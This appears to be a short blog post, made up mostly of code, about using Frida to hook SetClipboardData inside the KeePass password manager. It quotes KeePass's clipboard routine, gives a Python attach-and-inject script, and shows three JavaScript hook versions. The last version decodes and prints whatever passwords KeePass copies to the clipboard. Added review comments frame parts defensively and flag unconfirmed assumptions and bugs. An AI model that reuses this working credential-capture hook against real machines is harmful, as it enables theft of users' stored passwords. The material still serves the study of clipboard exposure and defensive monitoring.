Fun With Frida

James
James
Jun 2 · 7 min read
/// <summary>
/// Copies <paramref name="pbData"/> into a global memory block and hands that block to the
/// clipboard under format <paramref name="uFormat"/>.
/// </summary>
/// <param name="uFormat">Clipboard format identifier, passed straight through to SetClipboardData.</param>
/// <param name="pbData">Raw bytes to place on the clipboard; the whole array is copied.</param>
/// <returns>
/// <c>true</c> when SetClipboardData accepted the block. <c>false</c> when allocation, locking or
/// SetClipboardData itself failed; in those cases the block is freed before returning.
/// </returns>
/// <remarks>
/// Anything placed on the clipboard is readable by other processes in the same desktop session,
/// so callers that put secrets here should treat them as exposed from this point on.
/// </remarks>
private static bool SetDataW(uint uFormat, byte[] pbData)
{
    UIntPtr pSize = new UIntPtr((uint)pbData.Length);
    IntPtr h = NativeMethods.GlobalAlloc(NativeMethods.GHND, pSize);
    if(h == IntPtr.Zero) { Debug.Assert(false); return false; }

    // The allocator may round the block up; only "not smaller than requested" is asserted.
    Debug.Assert(NativeMethods.GlobalSize(h).ToUInt64() >= (ulong)pbData.Length); // Might be larger

    IntPtr pMem = NativeMethods.GlobalLock(h);
    if(pMem == IntPtr.Zero)
    {
        Debug.Assert(false);
        NativeMethods.GlobalFree(h);
        return false;
    }

    Marshal.Copy(pbData, 0, pMem, pbData.Length);
    NativeMethods.GlobalUnlock(h); // May return false on success

    // The block is released only on failure: after a successful SetClipboardData the system
    // owns it and it must not be freed here.
    if(NativeMethods.SetClipboardData(uFormat, h) == IntPtr.Zero)
    {
        Debug.Assert(false);
        NativeMethods.GlobalFree(h);
        return false;
    }

    return true;
}
// Decodes the clipboard payload with the platform default encoding for display.
// NOTE(review): Encoding.Default is the ANSI code page on .NET Framework and UTF-8 on .NET Core,
// so this output is platform-dependent. If pbData holds CF_UNICODETEXT (UTF-16LE) bytes, as the
// W suffix on SetDataW suggests, Encoding.Unicode is the matching decoder — confirm the format.
var str = System.Text.Encoding.Default.GetString(pbData);
import frida
import sys
import codecs
def on_message(message, data) -> None:
    """Print whatever the injected script reports back.

    Messages of type 'send' print their payload, type 'error' prints the JS
    stack, and anything else is printed raw. `data` is unused here.
    """
    if message['type'] == 'send':
        print(message['payload'])
    elif message['type'] == 'error':
        print(message['stack'])
    else:
        print(message)


# Attach to the running KeePass process by name. Attaching typically needs the
# same user context as the target (or higher); an unexpected attach to a
# password manager is the kind of event defenders want process telemetry on.
try:
    session = frida.attach("KeePass.exe")
    print ("[+] Process Attached")
except Exception as e:
    # NOTE(review): exits with status 0 even though attaching failed, so a
    # wrapper script cannot tell failure from a clean run.
    print (f"Error => {e}")
    sys.exit(0)

# Read the hook source from disk and inject it; on_message receives its output.
with codecs.open('./Inject.js', 'r', 'utf-8') as f:
    source = f.read()
script = session.create_script(source)
script.on('message', on_message)
script.load()

# Keep this process alive until Ctrl-C so the hook stays installed.
# NOTE(review): `while True: pass` spins at 100% CPU; a blocking call such as
# sys.stdin.read() would wait without burning a core.
try:
    while True:
        pass
except KeyboardInterrupt:
    session.detach()
    sys.exit(0)
// Resolve user32!SetClipboardData in the target process.
// NOTE(review): findExportByName returns null when the export is missing and
// Interceptor.attach(null) then throws; nothing here checks for that.
var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData")
// Attach a hook to the native pointer. This first version only logs that the
// call happened; the arguments are not inspected yet.
Interceptor.attach(user32_SetClipboardData, {
    onEnter: function (args, state) {
        console.log("[+] KeePass called SetClipboardData");
    },

    onLeave: function (retval) {
    }
});
// Resolve user32!SetClipboardData in the target process (the original comment
// said MessageBoxA, a leftover from the Frida docs example).
var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData")

// Attach a hook to the native pointer and dump the start of the buffer being
// placed on the clipboard. For defenders the point is that whatever a
// password manager copies is visible to any code running as the same user;
// the hook only makes that visible.
Interceptor.attach(user32_SetClipboardData, {
    onEnter: function (args, state) {
        console.log("[+] KeePass called SetClipboardData");
        // args[1] is hMem (an HGLOBAL). Reading it as a pointer and dereferencing
        // presumably reaches the data block through the handle's internal layout
        // rather than the documented GlobalLock API — TODO confirm. Only the first
        // 32 bytes are read, so longer text is truncated. `ptr` is an ArrayBuffer
        // despite its name.
        var ptr = args[1].readPointer().readByteArray(32);
        console.log(ptr)
    },

    onLeave: function (retval) {
    }
});
// Resolve user32!SetClipboardData in the target process (the original comment
// said MessageBoxA, a leftover from the Frida docs example).
var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData")
// Attach a hook to the native pointer and decode the first 32 bytes of the
// buffer as UTF-16 text via ab2str.
Interceptor.attach(user32_SetClipboardData, {
    onEnter: function (args, state) {
        console.log("[+] KeePass called SetClipboardData");
        // args[1] is hMem (an HGLOBAL); the double dereference presumably relies on
        // the handle's internal layout rather than GlobalLock — TODO confirm. The
        // 32-byte read truncates anything longer than 15 UTF-16 code units plus NUL.
        var ptr = args[1].readPointer().readByteArray(32);
        var str = ab2str(ptr);
        // NOTE(review): text starting with "--" is treated as the placeholder KeePass
        // writes when it clears the clipboard; verify against the KeePass source.
        if(!str.startsWith("--")){
            console.log("[+] Captured Data!")
            console.log(str);
        }
        else{
            console.log("[+] Clipboard was cleared")
        }
    },

    onLeave: function (retval) {
    }
});
// Decode an ArrayBuffer as UTF-16 code units into a JS string.
// Every code unit in buf is converted, so nothing stops at a NUL terminator:
// with a fixed 32-byte read, whatever sits after the terminator is appended too.
// String.fromCharCode.apply also fails for very large buffers (argument limit),
// which does not matter at 32 bytes.
function ab2str(buf){
    return String.fromCharCode.apply(null, new Uint16Array(buf));
}
